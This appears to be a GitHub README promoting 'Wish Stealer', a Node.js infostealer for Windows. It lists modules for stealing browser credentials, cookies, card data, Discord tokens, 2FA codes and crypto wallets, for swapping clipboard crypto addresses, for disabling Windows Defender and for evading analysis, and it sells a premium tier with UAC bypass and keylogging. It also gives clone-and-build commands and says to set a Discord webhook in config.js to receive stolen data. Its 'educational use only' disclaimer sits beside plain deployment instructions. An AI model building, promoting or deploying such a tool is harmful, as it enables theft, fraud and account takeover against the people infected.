multicogs

@Wish Stealer

Node.js malware for Windows that steals data from Discord, browsers, and crypto wallets, affecting all users.

Table of Contents

• Overview
  • Features
  • Premium Features
• Getting Started
  • Requirements
  • Installation
• Usage
• Preview
  • Star History
• Uninstalling
• Acknowledgments
• Contributing
• Contact
• License
• Disclaimer

Overview

The most comprehensive open-source stealer based on Node.js available on GitHub. 🚀 This Discord stealer utilizes a privilege escalation technique to gain access to all user sessions on Windows. 🔑

• If you're wondering where the previous "AuraThemes" repository was, it was simply abandoned by the creation of this new one. 🗂️

Features (+50)

• Development
  • Clean and efficient codebase. ✨
  • Up-to-date dependencies. 📅
  • Minimal reliance on external Node.js libraries. 📦
• Modules
  • antidebug: Terminates debugging tools (incomplete). 🛠️
  • antivirus: Disables Windows Defender and blocks access to antivirus-related websites. 🚫
  • antivm: Terminates execution if running inside a virtual machine environment. 🖥️
  • browsers:
    • Captures logins, cookies, credit card details, bookmarks, autofill data, browsing history, and downloads from 37 Chromium-based browsers. 🔍
    • Captures logins, cookies, browsing history, bookmarks, and downloads from 10 Gecko/Firefox-based browsers. 🦊
  • sessions: Extracts active sessions from platforms like Spotify, TikTok, and Instagram. 📱
  • clipper: Monitors the clipboard for crypto addresses and replaces them. 💰
  • commonfiles: Collects sensitive files from common directories on the system. 📂
  • fakeerror: Displays a fake error message to trick users into thinking the program has crashed. ❌
  • games: Extracts session data from popular game launchers like Epic Games and Minecraft and More. 🎮
  • hideconsole: Hides the console window to run the program discreetly. 👀
  • injections: Injects into applications like Discord and crypto wallets to capture sensitive information. 💉
    • discord:
      • Persistent startup injection (remains active even if the user attempts to remove it). 🔄
      • Captures logins, registration data, and two-factor authentication requests. 📧
      • Intercepts email and password change requests as well as backup code requests. 🔑
      • Blocks QR code logins and views of connected devices. 🚫
      • Phishing mode simulates alerts to trick users into changing their email credentials. 🎣
  • killprocess: Terminates processes that are listed in a predefined blacklist. 🚷
  • socials: Extracts data from over 20 social media applications, stealing sensitive information from each. 📸
  • startup: Ensures the program launches automatically when the system starts. ⚙️
  • stealcodes: Captures (2FA) codes from services like Discord, GitHub, Google, and more. 🔒
  • system: Gathers detailed system information including IP address, installed antivirus software, screenshots, CPU, GPU, RAM details, location, and saved Wi-Fi networks. 📊
  • tokens: Extracts tokens from four Discord applications and over 30 browsers. 🗝️
  • vpns: Retrieves sensitive files from over 20 VPN applications installed on the system. 🔐
  • wallets: Extracts data from more than 30 browser-based cryptocurrency wallets, as well as crucial information from locally installed wallets. 💼

Premium Features

• Marked features: Premium
  • Upload files: Upload files seamlessly. 📤
  • Update/Reinstall Bypass: Bypass update and reinstallation processes. 🔄
  • File/Session Theft: Steal files and active sessions. 📂
  • Clipper Wallets: Monitor and replace cryptocurrency wallet addresses. 💰
  • Launcher Stealer: Extract data from game launchers. 🎮
  • VPN and Messenger Stealers: Capture sensitive data from VPNs and messaging apps. 🌐
  • Extension Injection: Inject malicious extensions into browsers. 💉
  • UAC Bypass: Bypass User Account Control prompts. 🚫
  • Wallet Injection: Inject data into cryptocurrency wallets. 💳
  • Email Injection: Intercept and modify email communications. 📧
  • Keylogger Integration: Record keystrokes for sensitive information. ⌨️
  • Discord Injection (Force 2FA Disabled): Inject into Discord to disable two-factor authentication. 🔒
  • Builder, Discord Bot, and API: Generator to create an executable with version, copyright and legitimate application names, plus an API for interaction with the bot, injections and the Stealer. 🤖

Getting Started

Requirements

Install Node.js LTS

• Download Node.js Visit the official Node.js LTS page to download the Long-Term Support (LTS) version.

Install the Visual C++ Build Environment

• For Visual Studio 2019 or later Install the Desktop development with C++ workload via Visual Studio Community.
• For versions earlier than Visual Studio 2019 Use the Visual Studio Build Tools and select the Visual C++ build tools option during installation.

Hardware

JavaScript, in its native form, lacks direct control over hardware. Therefore, this project relies on modules that utilize C++, which does provide direct access to hardware components. By leveraging the node-gyp library, I can interface with C++ and perform operations that JavaScript cannot accomplish directly.

to correctly install node-gyp go to its repo: node-gyp

Installation

• Follow these steps to have it or watch the video YouTube!

• Install Git and then use these commands in the console.

Usage

• If you want to create an Executable all at once, simply do:

• If an error occurs in the create of your Executable: Try to open the CMD with Administrator Permissions

git clone https://github.com/k4itrun/wish.git

npm run builder:install && npm run builder:start

• But if you just want to Test the code, just do:

• Edit config.js for your Discord webhook and crypto addresses.

git clone https://github.com/k4itrun/wish.git

npm run src:install && npm run src:start

• You can also use (electron-builder, pkg, nexe, etc...) to build your own executable.

Preview

Star History

Uninstalling

• Open PowerShell as Administrator.

• Terminate processes:

taskkill /f /t /im Wish.exe
taskkill /f /t /im WindowsSecurityHealthService.exe

• Remove from startup:

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Health Service" /f

Acknowledgments

This project draws inspiration from various infostealers. Special thanks to:

• Stealerium: Based on clipper and keylogging, with plans for future versions.
• hackirby: Features decryption and code organization functions.
• addi00000: Includes browser-related embed customizations.
• can-kat: Focuses on extensions and wallet path detection.

Contributing

We greatly appreciate any contributions to this project! Whether you want to open new issues, submit pull requests, or share suggestions for improvements, your input is invaluable. We encourage you to refer to our Contributing Guidelines to facilitate a seamless collaboration process.

You can also support the development of this software through a donation, helping me bring new optimal and improved projects to life.

Thank you for your interest and support! ✌️

Contact

For any inquiries or support, you can reach out via billoneta@proto.me or join our Discord Server.

License

This software is licensed under the MIT License.

Disclaimer

Important Notice: Educational Use Only.

This tool is designed solely for educational purposes. Any misuse of this tool is strictly prohibited. By using this tool, you acknowledge and accept these terms.

User Accountability:

By utilizing this tool, you take full responsibility for your actions. The creator disclaims any liability for misuse. It is your responsibility to ensure that your use of this software complies with all applicable laws and regulations.

No Assistance:

The creator will not provide assistance or support for any misuse of this tool. Any inquiries related to harmful or illegal activities will be ignored.

Terms Acceptance:

By using this tool, you agree to abide by this disclaimer. If you do not agree with these terms, please do not use the software.